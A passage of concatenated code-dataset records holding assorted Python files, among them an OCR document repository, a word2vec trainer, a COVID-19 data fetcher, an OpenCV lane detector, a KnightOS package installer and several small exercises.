block_info['regions'] = page['regions']\n return block_info\n except Exception as e:\n AppContext.addRecordID(recordID)\n log_exception('Exception on save document | DigitalDocumentRepo :{}'.format(str(e)), AppContext.getContext(), e)\n return post_error(\"Data Missing\",\"Failed to store doc since data is missing\",None)\n\n\n def format_page_data(self,page_blocks):\n block1 = page_blocks[0]\n pages = {}\n file = {}\n if \"file_identifier\" in block1:\n file[\"identifier\"] = block1[\"file_identifier\"]\n file[\"name\"] = block1[\"file_name\"]\n file[\"type\"] = block1[\"file_type\"]\n config = {}\n config[\"language\"] = block1[\"file_locale\"]\n\n pages[\"file\"] = file\n pages[\"config\"] = config\n pages[\"pages\"] = []\n for block in page_blocks:\n if block == None:\n pages[\"pages\"].append(None)\n continue\n block_info = {}\n block_info[\"identifier\"]= block[\"page_info\"][\"page_identifier\"]\n block_info[\"resolution\"]= block[\"page_info\"][\"page_resolution\"]\n block_info[\"path\"] = block[\"page_info\"][\"page_img_path\"]\n block_info[\"boundingBox\"]= block[\"page_info\"][\"page_boundingBox\"]\n 
block_info[\"page_no\"] = block[\"page_info\"][\"page_no\"]\n block_info[\"regions\"] = block[\"regions\"]\n\n pages[\"pages\"].append(block_info)\n return pages\n\n \n\n\n\n\n","sub_path":"anuvaad-etl/anuvaad-extractor/ocr-content-handler/src/repositories/ocr_document.py","file_name":"ocr_document.py","file_ext":"py","file_size_in_byte":8074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"406832584","text":"# -*- coding: utf-8 -*-\n'''\nГенерация word2vector моделей для слов и частей слов.\nИспользуется возможность gensim брать текст из генератора.\n'''\n\nfrom __future__ import print_function\nfrom gensim.models import word2vec\nimport logging\nimport os\nimport random\nfrom collections import Counter\n\n\n# ----------------------------------------------------------------------------\n\n# Будем генерировать корпус с частями слов на лету, читая по одному предложению\n# из исходного корпуса. Для каждого исходного предложения создается несколько\n# новых предложений, включая исходный вариант.\nclass WordPartsGenerator:\n '''\n fname - имя файла с исходным корпусом\n max_per_line - макс. число предложений с частями слов, генерируемых из одного исходного\n '''\n def __init__(self, fname, max_per_line, min_part_len, max_part_len, max_lines ):\n self.fname = fname\n self.max_per_line = max_per_line\n self.min_part_len = min_part_len\n self.max_part_len = max_part_len\n self.max_lines = max_lines\n self.line_buf = []\n self.ibuf= 0\n self.rdr = None\n self.total_lines = 0\n \n def fill_buffer(self):\n self.line_buf = []\n self.ibuf = 0\n\n line = self.rdr.readline().decode('utf-8').strip()\n if line==None:\n return\n\n n_generated=0\n nprobe=0\n words = line.split(' ')\n \n self.line_buf.append( words ) # исходное предложение добавляется обязательно\n self.total_lines += 1\n \n if len(words)>2:\n while n_generatedself.max_part_len and not '_' in word:\n pos0 = random.randint(0,wlen-self.min_part_len-1)\n maxpos1 = min( wlen-1, pos0+self.max_part_len-1 )\n pos1 = random.randint(pos0+self.min_part_len,maxpos1)\n \n word2 = u''\n if pos0>0:\n word2 += u'~'\n \n word2 += word[pos0:pos1+1]\n \n if pos1self.max_lines:\n raise StopIteration\n\n line = self.line_buf[self.ibuf]\n self.ibuf += 1\n return line\n\n# ----------------------------------------------------------------------------\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\n# путь к файлу с исходным текстовым корпусом.\n# файл содержит одно предложение в каждой строке. слова приведены к нижнему регистру,\n# пунктуаторы убраны, токены разделены пробелами.\ncorpus_path = os.path.expanduser('~/Corpus/word2vector/ru/SENTx.corpus.w2v.txt')\n\n# параметры w2v модели\nSIZE=32\nWINDOW=1\nCBOW=0\nMIN_COUNT=2\n\n# минимальная длина фрагмента слова\nMIN_PART_LEN = 2\n\n# максимальная длина фрагмента слова\nMAX_PART_LEN = 4\n\n# сколько вариантов замен получается из одного предложения\nN_NEWLINE_PER_SENTENCE = 10\n\n\n# подсчитаем, сколько строк в исходном корпусе, чтобы потом\n# давать оценку завершенности генерации корпуса.\nprint( 'Counting lines in source corpus', corpus_path, '...' )\nnline=0\nfor line in open(corpus_path,'r'):\n nline += 1\nprint( 'Done, ', nline, ' lines.' )\n\nmax_lines = nline*N_NEWLINE_PER_SENTENCE\n\n\n# Соберем частотный словарь для слов и частей слов.\nprint( 'Collecting the wordpart frequencies...' 
)\nwordpart_counts = Counter()\nword_counts = Counter()\ncorp = WordPartsGenerator(corpus_path,N_NEWLINE_PER_SENTENCE,MIN_PART_LEN,MAX_PART_LEN,max_lines)\nnline=0\nfor line in corp:\n    for word in line:\n        if u'~' in word:\n            wordpart_counts[word] += 1\n        else:\n            word_counts[word] += 1\n\n    nline += 1\n    if 0 == (nline % 10000):\n        print( '{0}/{1} ==> {2}%'.format(nline,max_lines,100.0*nline/max_lines), end='\\r' )\n\nprint( 'done, {0} lines processed. {1} unique words, {2} unique word parts'.format(nline,len(word_counts),len(wordpart_counts) ) )\n\nWORDPART_FREQUENCIES_FILENAME = 'wordpart.frequencies.dat'\nwith open( WORDPART_FREQUENCIES_FILENAME, 'w' ) as f:\n    for d in wordpart_counts.iteritems():\n        f.write( d[0].encode('utf-8') + '\\t' + str(d[1]) + '\\n' )\n\nWORD_FREQUENCIES_FILENAME = 'word.frequencies.dat'\nwith open( WORD_FREQUENCIES_FILENAME, 'w' ) as f:\n    for d in word_counts.iteritems():\n        f.write( d[0].encode('utf-8') + '\\t' + str(d[1]) + '\\n' )\n\n\nfilename = 'wordparts.CBOW=' + str(CBOW)+'_WIN=' + str(WINDOW) + '_DIM='+str(SIZE)\n\n# dump all model parameters to a separate text file\nwith open( filename + '.info', 'w+') as info_file:\n    print('corpus_path=', corpus_path, file=info_file)\n    print('SIZE=', SIZE, file=info_file)\n    print('WINDOW=', WINDOW, file=info_file)\n    print('CBOW=', CBOW, file=info_file)\n    print('MIN_COUNT=', MIN_COUNT, file=info_file)\n\n# start training w2v on the generated corpus\nsentences = WordPartsGenerator(corpus_path,N_NEWLINE_PER_SENTENCE,MIN_PART_LEN,MAX_PART_LEN,max_lines)\nmodel = word2vec.Word2Vec(sentences, size=SIZE, window=WINDOW, cbow_mean=CBOW, min_count=MIN_COUNT, workers=4, sorted_vocab=1, iter=1 )\n\nmodel.init_sims(replace=True)\n\n# save the trained w2v model\nmodel.save_word2vec_format( filename + '.model', binary=True)\n\n","sub_path":"PyUtils/wordparts.py","file_name":"wordparts.py","file_ext":"py","file_size_in_byte":7092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"356650739","text":"import sys\nimport os\nimport time\nimport logging\nimport shutil\nfrom watchdog.observers import Observer\nfrom watchdog.events import *\n\nclass WatchSnippetHandler(FileSystemEventHandler):\n    def __init__(self):\n        self.snippetsDir = \"/Users/ligf/Library/Application Support/Code/User/snippets\"\n        FileSystemEventHandler.__init__(self)\n\n    def on_modified(self, event):\n        if not event.is_directory:\n            fp = event.src_path\n            fn, fext = os.path.splitext(fp)\n            if fext == \".code-snippets\":\n                dest_fp = self.snippetsDir\n                shutil.copy(fp, dest_fp)\n                print(event.src_path)\n\nif __name__ == \"__main__\":\n\n    path = sys.argv[1] if len(sys.argv) > 1 else '.'\n    event_handler = WatchSnippetHandler()\n    observer = Observer()\n    observer.schedule(event_handler, path, recursive=True)\n    observer.start()\n    try:\n        while True:\n            time.sleep(1)\n    except KeyboardInterrupt:\n        observer.stop()\n    observer.join()\n\n","sub_path":"snippets/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"652881788","text":"# -*- coding: utf-8 -*-\n\nimport requests\nimport csv\nimport pandas as pd\n\n\ndef get_data_from_local():\n    # Download the dataset (derived from the remote version)\n    BASE_FILES = './time_series/time_series_2019-ncov-{}.csv'\n    CATEGORIES = ['Confirmed', 'Deaths', 'Recovered']\n    DATAFRAMES = {}\n\n    # Iterate through all files\n    for _category in CATEGORIES:\n        pathfile = 
BASE_FILES.format(_category)\n        with open(pathfile) as file:\n            _text = file.read()\n\n        # Extract data\n        data = list(csv.DictReader(_text.splitlines()))\n        df = pd.DataFrame(data)\n\n        # Data Cleaning\n        df = df.iloc[:, [1, -1]] # Select only Country and its last values\n        df.columns = ['Country/Region', _category]\n        df[_category] = pd.to_numeric(df[_category])\n        df['Country/Region'].replace({'Mainland China': 'China'}, inplace=True)\n        df.dropna(axis=0, how='any', thresh=None, subset=None, inplace=True)\n\n        DATAFRAMES[_category.lower()] = df\n\n    DATAFRAMES['timestamp'] = _text.splitlines()[0].split(',')[-1]\n\n    return DATAFRAMES\n\n\ndef get_data_from_http():\n    # Download the dataset (Source: https://github.com/nat236919/Covid2019API/blob/master/app/helper.py)\n    BASE_URL = 'https://raw.githubusercontent.com/CSSEGISandData/2019-nCoV/master/time_series/time_series_2019-ncov-{}.csv'\n    CATEGORIES = ['Confirmed', 'Deaths', 'Recovered']\n    DATAFRAMES = {}\n\n    # Iterate through all files\n    for category in CATEGORIES:\n        url = BASE_URL.format(category)\n        res = requests.get(url)\n        text = res.text\n\n        # Extract data\n        data = list(csv.DictReader(text.splitlines()))\n        df = pd.DataFrame(data)\n\n        # Data Cleaning\n        df = df.iloc[:, [1, -1]] # Select only Country and its last values\n        df.columns = ['Country/Region', category]\n        df[category] = pd.to_numeric(df[category])\n        df['Country/Region'].replace({'Mainland China': 'China'}, inplace=True)\n        df.dropna(axis=0, how='any', thresh=None, subset=None, inplace=True)\n\n        DATAFRAMES[category.lower()] = df\n\n    DATAFRAMES['timestamp'] = text.splitlines()[0].split(',')[-1]\n\n    return DATAFRAMES\n\n\ndef get_data(use_local=False):\n    if use_local:\n        return get_data_from_local()\n    else:\n        return get_data_from_http()\n\n\nclass DataModel:\n    def __init__(self):\n        self._data = None\n        self.pull_data()\n\n    def pull_data(self):\n        try:\n            self._data = get_data(use_local=False)\n            print('Data fetched')\n        except Exception:\n            print('Error while fetching data')\n\n    def get_latest_value(self):\n        deaths = sum([int(i) for i in self._data['deaths']['Deaths']])\n        confirmed = sum([int(i) for i in self._data['confirmed']['Confirmed']])\n        recovered = sum([int(i) for i in self._data['recovered']['Recovered']])\n        latest_data = {'deaths': deaths, 'confirmed': confirmed, 'recovered': recovered}\n\n        time = self._data['timestamp']\n\n        return {'timestamp': time, 'data': latest_data}\n\n    def get_case_by_country(self):\n        pass\n","sub_path":"app/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"251972697","text":"import os\n\nmypath = r'C:\\Temp'\n\ndef listDir(dir):\n    fileNames = os.listdir(dir)\n    totalFileCount = 0\n    totalFileSize = 0\n\n    for filename in fileNames:\n        #print('File Name: ' + filename)\n        #print('Folder Path ' + os.path.abspath(os.path.join(dir, filename)), sep='\\n')\n        totalFileCount += 1\n\n    print('Total File Count = ' + str(totalFileCount))\n\n    for file in fileNames:\n        # os.stat needs a path the process can resolve, so join the listed\n        # name back onto the directory being scanned\n        totalFileSize += os.stat(os.path.join(dir, file)).st_size\n\n    print('Total File Size = ' + str(totalFileSize))\n\nif __name__ == '__main__':\n    listDir(mypath)\n\n#listDir(mypath)\n","sub_path":"other/test/file3.py","file_name":"file3.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"346269957","text":"from app import admin\nfrom app import modeles\nfrom app import db\nfrom app.vues.admin import VueModele\n\nclass VueCourse(VueModele):\n\n    ''' Information about the 
rides. '''\n\n    can_create = True\n    can_edit = True\n    can_delete = True\n\n    form_columns = [\n        'utilisateur',\n        'places',\n        'priorite',\n        'debut',\n        'commentaire',\n        'bagages',\n        'animaux',\n        'animaux_grands',\n        'gare',\n        'aeroport',\n        'depart',\n        'arrivee'\n    ]\n\nadmin.add_view(\n    VueCourse(\n        modeles.Course,\n        db.session\n    )\n)\n","sub_path":"app/vues/admin/courses.py","file_name":"courses.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"621286906","text":"from __future__ import division\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef showImage(image):\n    plt.imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n    plt.axis(\"off\")\n    plt.show()\n\ndef extractROI(image, vertices):\n    mask = np.zeros_like(image)\n    required_region = (255,) * 3\n    cv2.fillPoly(mask, vertices, required_region)\n    return mask\n\n\ncap = cv2.VideoCapture('lane_lines_images/challenge.mp4')\n\nfourcc = cv2.cv.FOURCC('m', 'p', '4', 'v')\n_, sample_image = cap.read()\nsize = (sample_image.shape[1], sample_image.shape[0])\nout = cv2.VideoWriter('Simple_Lane_detector_challenge.mp4', fourcc, 30, size, True)\n\nwhile cap.isOpened():\n    ret, img_color = cap.read()\n    if ret is True:\n\n        # Read sample image and convert to hsv format\n        # img_color = cv2.imread('lane_lines_images/whiteCarLaneSwitch.jpg')\n        img_intermediate = img_color.copy()\n        img_final = img_color.copy()\n        im_height, im_width, _ = img_color.shape\n        # print(img_color.shape)\n        img_color = cv2.resize(img_color, (960, 540))\n        img_hsv = cv2.cvtColor(img_color, cv2.COLOR_BGR2HSV)\n\n        # showImage(img_color)\n\n\n        # In[38]:\n\n        # Create mask for Yellow and White\n        lower_yellow = np.array([20, 100, 100], dtype=np.uint8)\n        upper_yellow = np.array([30, 255, 255], dtype=np.uint8)\n\n        lower_white = np.array([0, 0, 230], dtype=np.uint8)\n        upper_white = np.array([255, 20, 255], dtype=np.uint8)\n\n        yellow_mask = cv2.inRange(img_hsv, lower_yellow, upper_yellow)\n        white_mask = cv2.inRange(img_hsv, lower_white, upper_white)\n\n        mask = cv2.bitwise_or(white_mask, yellow_mask)\n        image_masked = cv2.bitwise_or(img_color, img_color, mask=mask)\n\n\n        # Canny Edge detection\n        blur_masked = cv2.GaussianBlur(image_masked, (3,3), 0)\n        x_len, y_len, _ = img_hsv.shape\n        canny_img = cv2.Canny(blur_masked, threshold1=50, threshold2=255, apertureSize=3)\n        plt.imshow(canny_img)\n\n        print(img_color.shape)\n        # Get Mask to extract region of interest from the canny image\n\n        vertices = np.array([[(0,im_height),(im_width/2, im_height/2), (im_width/2, im_height/2), (im_width,im_height)]], dtype=np.int32)\n        # vertices = np.array([[(im_width/2, im_height),(im_width/2, im_height/2), (im_width/2, im_height/2), (im_width,im_height)]], dtype=np.int32)\n        roi_mask = extractROI(canny_img, vertices)\n        roi_image = cv2.bitwise_and(canny_img, roi_mask)\n\n\n\n        minLineLength = 100\n        maxLineGap = 10\n        lines = cv2.HoughLinesP(roi_image,3,np.pi/180,20,minLineLength)\n\n        img_intermediate = img_color.copy()\n        left_x = []\n        left_y = []\n        right_x = []\n        right_y = []\n        for x in range(0, len(lines)):\n            for x1, y1, x2, y2 in lines[x]:\n                if(x2 -x1) != 0:\n                    slope = (y2 - y1) / (x2 - x1)\n                    if np.fabs(slope) < 0.2:\n                        continue\n                    elif slope < 0 : # left lane, green is left\n                        cv2.line(img_intermediate,(x1,y1),(x2,y2),(0,255,0),2)\n                        left_x.extend([x1, x2])\n                        left_y.extend([y1, y2])\n                    elif slope > 0: # right lane, red is right, it rhymes ;)\n                        right_x.extend([x1, x2])\n                        right_y.extend([y1, y2])\n                        
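# in image coordinates y grows downward, so segments with positive slope\n                        # lean toward the right lane; their endpoints feed the right-lane\n                        # degree-1 polyfit further down, mirroring the slope < 0 branch above\n                        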
cv2.line(img_intermediate,(x1,y1),(x2,y2),(0,0,255),2)\n\n # showImage(img_intermediate)\n\n\n # In[77]:\n\n # let's plot the right x and y coordinates as a scatter plot.\n # plt.scatter(right_x, right_y)\n # plt.show()\n # plt.scatter(left_x, left_y)\n # plt.show()\n # To obtain a single line , we can apply linear regression to fit a line to the points.\n # We start by fitting a polynomial of degree one and we get a polynomial for right lane\n\n deg_1_poly = np.polyfit(right_y, right_x, deg=1)\n right_lane_polynomial = np.poly1d(deg_1_poly)\n print('Right lane polynomial :' + str(right_lane_polynomial))\n\n deg_1_poly = np.polyfit(left_y, left_x, deg=1)\n left_lane_polynomial = np.poly1d(deg_1_poly)\n print('Left lane polynomial :' + str(left_lane_polynomial))\n\n # Get a single line from the polynomial. Since the line cannot extend from bottom to the top of the image,\n # let us limit the line to region of interest\n min_y = int(img_final.shape[0]/1.7)\n max_y = int(img_final.shape[0] )\n right_x_start = int(right_lane_polynomial(max_y))\n right_x_end = int(right_lane_polynomial(min_y))\n\n left_x_start = int(left_lane_polynomial(max_y))\n left_x_end = int(left_lane_polynomial(min_y))\n\n\n\n img_final = img_color.copy()\n # cv2.line(img_final, (right_x_start, max_y), (right_x_end, min_y), (0, 255,0), 4)\n # cv2.line(img_final, (left_x_start, max_y), (left_x_end, min_y), (0, 0,255), 4)\n # showImage(img_final)\n\n just_line = np.zeros(img_final.shape, dtype=np.uint8);\n cv2.line(just_line, (right_x_start, max_y), (right_x_end, min_y), (0, 0,255), 4)\n cv2.line(just_line, (left_x_start, max_y), (left_x_end, min_y), (0, 255,0), 4)\n\n img_final = cv2.addWeighted(img_final, 0.8, just_line, 1, 0);\n # showImage(img_final)\n # cv2.imshow('Main Window', img_final)\n # cv2.waitKey(100)\n\n out.write(img_final)\n else:\n break\n\ncap.release()\nout.release()\ncv2.destroyAllWindows()","sub_path":"Simple_Lane_Detection.py","file_name":"Simple_Lane_Detection.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"271175275","text":"with open('Q18b.txt', 'r') as f:\n prompt = f.read()\n\nprompt = prompt.split()\n\ngrid = []\nstarts = []\n\nfor i in prompt:\n grid.append([])\n for j in i:\n grid[-1].append(j)\n\nfor i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == '@':\n starts.append((i,j))\n\n\ndef find_keys(pos, grid, found):\n points = [pos]\n dist = {pos: 0}\n keys = {}\n\n while len(points) > 0:\n check = points[0]\n points = points[1:]\n for p in (\n (check[0] + 1, check[1]),\n (check[0] - 1, check[1]),\n (check[0], check[1] + 1),\n (check[0], check[1] - 1),\n ):\n if not (0 <= p[0] < len(grid) and 0 <= p[1] < len(grid[0])):\n continue\n c = grid[p[0]][p[1]]\n if c == '#':\n continue\n if p in dist:\n continue\n dist[p] = dist[check] + 1\n if 'A' <= c <= 'Z' and c.lower() not in found:\n continue\n if 'a' <= c <= 'z' and c not in found:\n keys[c] = dist[p], p\n else:\n points.append(p)\n return keys\n\n\ndef reachable4(grid, starts, havekeys):\n keys = {}\n for i, start in enumerate(starts):\n for ch, (dist, pt) in find_keys(start, grid, havekeys).items():\n keys[ch] = dist, pt, i\n return keys\n\n\ndef minwalk(grid, starts, found):\n hks = ''.join(sorted(found))\n if (starts, hks) in seen:\n return seen[starts, hks]\n keys = reachable4(grid, starts, found)\n if len(keys) == 0:\n ans = 0\n else:\n poss = []\n for ch, (dist, pt, roi) in keys.items():\n nstarts = tuple(pt if i 
== roi else p for i, p in enumerate(starts))\n poss.append(dist + minwalk(grid, nstarts, found + ch))\n ans = min(poss)\n seen[starts, hks] = ans\n return ans\n\n\nseen = {}\n\nprint(minwalk(grid, tuple(starts), ''))\n","sub_path":"2019/Day 18/Q18b.py","file_name":"Q18b.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"186704187","text":"'''\nInput: an integer\nReturns: an integer\n'''\n#\n# Implement a function eating_cookies that counts the number of possible \n# ways Cookie Monster can eat all of the cookies in the jar.\n\n# For example, for a jar of cookies with n = 3 (the jar has 3 cookies inside it), there are 4 possible ways for Cookie Monster to eat all the cookies inside it:\n\n# He can eat 1 cookie at a time 3 times\n# He can eat 1 cookie, then 2 cookies\n# He can eat 2 cookies, then 1 cookie\n# He can eat 3 cookies all at once.\n# Thus, eating_cookies(3) should return an answer of 4.#\n\n\n#U\n#need to store this data into memory to keep track of how many times the person is eating the cookie, like using cache?\n#need to pass in cache or memory as a parameter and initialize to None\n\n#n stands for number of cookies\n\n#look up permutations and recursion\n#as well as cache and memoization\n#used ring buffer from sprint as reference as well\n\n# P\n\n# E\n# R#\n\n#Less efficient method\n# def eating_cookies(n):\n# if n < 0:\n# return 0\n# elif n == 0:\n# return 1\n# else:\n# return eating_cookies(n-1) + eating_cookies(n-2) + eating_cookies(n-3)\n\n\n\n\n#n stands for input size- number of cookies in the jar\n#pass in cache (memory storage holder) as parameter and default to none\n#cache helps to make run time faster O (n). data structure that stores redundant data\n#cache is a dictionary where keys is the n, value is the answer\n\ndef eating_cookies(n, cache = None):\n # Your code here\n\n #if cache array is empty then initialize it\n if cache == None:\n cache = [0] * (n + 1) #(n+1) refering to the input size incrementing/increasing by 1. 
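\n    # Worked example of the memoization: cache[k] holds the number of ways to\n    # finish a jar of k cookies, so each subproblem is computed once. For n = 3\n    # the recursion fills cache = [1, 1, 2, 4], i.e. eating_cookies(3) == 4,\n    # matching the four orderings listed in the docstring above.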
\n \n\n #if input n is less than or equal to 1 than cache storage index will still be at 1\n #basically there is just one way to eat the cookie \n # and there is one way where he can not eat the cookie\n if n <= 1:\n cache[n] = 1\n\n #if input of cookies is 2, then cache storage index will be at 2\n #there are 2 ways in which he eat the cookie\n elif n ==2:\n cache[n] = 2\n\n #edge case if the index of cache[n] is at 0 \n #ate all of the cookies at once (eating all 3 cookies)\n elif cache[n] == 0:\n #answer saved in cache for future uses and call function recursively\n cache[n] = eating_cookies(n-1, cache) + eating_cookies(n-2, cache) + eating_cookies(n-3, cache)\n \n #return number of ways to eat cookies\n return cache[n]\n\n#Lecture method\n# def eating_cookies(n):\n# if n < 0:\n# return 0\n# elif n == 0:\n# return 1\n# elif cache[n] > 0:\n\n\nif __name__ == \"__main__\":\n # Use the main function here to test out your implementation\n num_cookies = 5\n\n print(f\"There are {eating_cookies(num_cookies)} ways for Cookie Monster to each {num_cookies} cookies\")\n","sub_path":"eating_cookies/eating_cookies.py","file_name":"eating_cookies.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"419972733","text":"from sys import exit, stderr, stdout\nfrom util import copytree\n\nimport os\nimport re\nimport requests\nimport subprocess\nimport pystache\nimport kpack\nimport errno\n\nfrom resources import get_resource_root\n\nclass Project:\n def __init__(self, root=None):\n self.root = root\n if self.root == None: self.root = findroot()\n\n def __del__(self):\n pass\n\n def full_name(self):\n repo = self.get_config(\"repo\")\n name = self.get_config(\"name\")\n if not repo or not name:\n return None\n return repo + \"/\" + name\n\n def open(self, path, mode=\"r\"):\n return open(os.path.join(self.root, path), mode=mode) # TODO: This leaks file descriptors\n\n def get_config(self, key, config=\"package.config\"):\n lines = None\n try:\n with self.open(config) as c:\n lines = c.readlines()\n except:\n return None\n for line in lines:\n if line.startswith(key):\n try:\n return line[line.index('=') + 1:].strip()\n except:\n pass\n return None\n\n def set_config(self, key, value, config=\"package.config\"):\n lines = None\n with self.open(config) as c:\n lines = c.readlines()\n found = False\n for i, line in enumerate(lines):\n if line.startswith(key):\n lines[i] = key + '=' + value + \"\\n\"\n found = True\n if not found:\n lines.append(\"{0}={1}\\n\".format(key, value))\n if value == '':\n lines = [l for l in lines if not l.startswith(key)]\n with self.open(\"package.config\", mode=\"w\") as c:\n c.write(''.join(lines))\n\n def get_packages(self):\n deps = self.get_config(\"dependencies\")\n if deps == None:\n deps = list()\n else:\n deps = deps.split(' ')\n for i, dep in enumerate(deps):\n if ':' in dep:\n deps[i] = dep.split(':')[0]\n return deps\n\n def get_implicit_packages(self, packages):\n extra = list()\n for package in packages:\n info = requests.get('https://packages.knightos.org/api/v1/' + package)\n if info.status_code == 404:\n stderr.write(\"Cannot find '{0}' on packages.knightos.org.\\n\".format(package))\n exit(1)\n elif info.status_code != 200:\n stderr.write(\"An error occured while contacting packages.knightos.org for information.\\n\")\n exit(1)\n for dep in info.json()['dependencies']:\n if not dep in extra and not dep in self.get_packages():\n if dep == self.full_name():\n 
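# the project being developed can appear in its own transitive\n                        # dependency graph; downloading it from the package index would be\n                        # circular, so it is skipped and the local tree satisfies it\n                        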
print(\"Notice: this project fulfills the '{0}' dependency, skipping\".format(dep))\n else:\n print(\"Adding dependency: \" + dep)\n extra.append(dep)\n return extra\n\n def gen_package_make(self):\n template_vars = { \"packages\": list() }\n for root, dirs, files in os.walk(os.path.join(self.root, \".knightos\", \"packages\")):\n for package in files:\n info = kpack.PackageInfo.read_package(os.path.join(self.root, \".knightos\", \"packages\", package))\n template_vars[\"packages\"].append({ \"name\": info.name, \"repo\": info.repo, \"filename\": package })\n if os.path.exists(os.path.join(self.root, \".knightos\", \"pkgroot\", \"slib\")):\n template_vars[\"libraries\"] = list()\n for root, dirs, files in os.walk(os.path.join(self.root, \".knightos\", \"pkgroot\", \"slib\")):\n for library in files:\n template_vars[\"libraries\"].append({ \"path\": os.path.join(self.root, \".knightos\", \"pkgroot\", \"slib\", library) })\n with open(os.path.join(get_resource_root(), \"templates\", \"packages.make\"), \"r\") as ofile:\n path = os.path.join(self.root, \".knightos\", \"packages.make\")\n with open(os.path.join(path), \"w\") as file:\n file.write(pystache.render(ofile.read(), template_vars))\n\n def install(self, packages, site_only, init=False, link=False):\n if len(packages) == 0 and os.path.exists(os.path.join(packages[0], \"package.config\")):\n # TODO: Install local package\n pass\n\n deps = self.get_packages()\n extra = self.get_implicit_packages(packages)\n all_packages = extra + packages\n all_packages = [p for p in all_packages if p != self.full_name()]\n files = []\n # Download packages\n for p in all_packages:\n stdout.write(\"Downloading {0}\".format(p))\n r = requests.get('https://packages.knightos.org/api/v1/' + p)\n path = os.path.join(self.root, \".knightos\", \"packages\", \"{0}-{1}.pkg\".format(r.json()['name'], r.json()['version']))\n files.append(path)\n with self.open(path, mode=\"wb\") as fd:\n _r = requests.get('https://packages.knightos.org/{0}/download'.format(r.json()['full_name']))\n total = int(_r.headers.get('content-length'))\n length = 0\n for chunk in _r.iter_content(1024):\n fd.write(chunk)\n length += len(chunk)\n if stdout.isatty():\n stdout.write(\"\\rDownloading {:<20} {:<20}\".format(p, str(int(length / total * 100)) + '%'))\n stdout.write(\"\\n\")\n # Initial extraction\n FNULL = open(os.devnull, 'w')\n subprocess.call([\"kpack\", \"-e\", path, os.path.join(self.root, \".knightos\", \"pkgroot\")], stdout=FNULL, stderr=subprocess.STDOUT)\n subprocess.call([\"kpack\", \"-e\", \"-s\", path, os.path.join(self.root, \".knightos\", \"pkgroot\")], stdout=FNULL, stderr=subprocess.STDOUT)\n if not site_only:\n for package in packages:\n deps.append(package)\n if not init:\n self.set_config(\"dependencies\", \" \".join(deps))\n if link:\n force_symlink(os.path.join(\"bin\", \"castle\"), os.path.join(self.root, \".knightos\", \"pkgroot\", \"bin\", \"launcher\"))\n force_symlink(os.path.join(\"bin\", \"threadlist\"), os.path.join(self.root, \".knightos\", \"pkgroot\", \"bin\", \"switcher\"))\n force_symlink(os.path.join(\"bin\", \"fileman\"), os.path.join(self.root, \".knightos\", \"pkgroot\", \"bin\", \"browser\"))\n\n # Install packages\n self.gen_package_make()\n return all_packages\n\ndef findroot():\n path = os.getcwd()\n while path != \"/\": # TODO: Confirm this is cross platform\n if \".knightos\" in os.listdir(path):\n return path\n else:\n path = os.path.realpath(os.path.join(path, \"..\"))\n stderr.write(\"There doesn't seem to be a KnightOS project here. 
Did you run `knightos init`?\\n\")\n exit(1)\n\n#Currently there's no way to overwrite a pre-existing symlink\ndef force_symlink(file1, file2):\n try:\n os.symlink(file1, file2)\n except OSError as e:\n if e.errno == errno.EEXIST:\n os.remove(file2)\n os.symlink(file1, file2)\n","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":7113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"392926090","text":"import numpy as np\nimport cv2\nimport copy\nfrom crisjfpy import list_join\nimport imutils\n\ndef consolidate_rect(rects_):\n rects = [tuple(val) for val in rects_]\n consolidate = [0]\n while len(consolidate) !=0:\n rects_out = []\n consolidate = []\n rects = list(set(rects))\n for i,(x1,y1,w1,h1) in enumerate(rects):\n for j,(x2,y2,w2,h2) in enumerate(rects[i+1:],i+1):\n if not ((x1+w1<=x2)|(x2+w2<=x1)|(y1+h1<=y2)|(y2+h2<=y1)): #Do they overlap?\n xc1,yc1 = (x1+0.5*w1),(y1+0.5*h1)\n xc2,yc2 = (x2+0.5*w2),(y2+0.5*h2)\n if (((xc1>=x2)&(xc1<=x2+w2))&((yc1>=y2)&(yc1<=y2+h2)))&(((xc2>=x1)&(xc2<=x1+w1))&((yc2>=y1)&(yc2<=y1+h1))): #Is the center of one contained in the other?\n consolidate.append((i,j))\n for i,j in consolidate:\n x,y = min(rects[i][0],rects[j][0]),min(rects[i][1],rects[j][1])\n w = max(rects[i][0]+rects[i][2],rects[j][0]+rects[j][2]) - x\n h = max(rects[i][1]+rects[i][3],rects[j][1]+rects[j][3]) - y\n rects_out.append((x,y,w,h))\n\n for i,val in enumerate(rects):\n if i not in set(list_join(consolidate)):\n rects_out.append(val)\n rects = copy.deepcopy(rects_out)\n rects = [np.array(val,dtype=np.int32) for val in rects]\n return rects\n\ndef DetectFaces(img):\n '''Finds faces using all cascades available.'''\n face_cascades = ['haarcascade_frontalcatface.xml','haarcascade_frontalcatface_extended.xml',\n 'haarcascade_frontalface_alt.xml','haarcascade_frontalface_alt2.xml',\n 'haarcascade_frontalface_alt_tree.xml','haarcascade_frontalface_default.xml']\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n 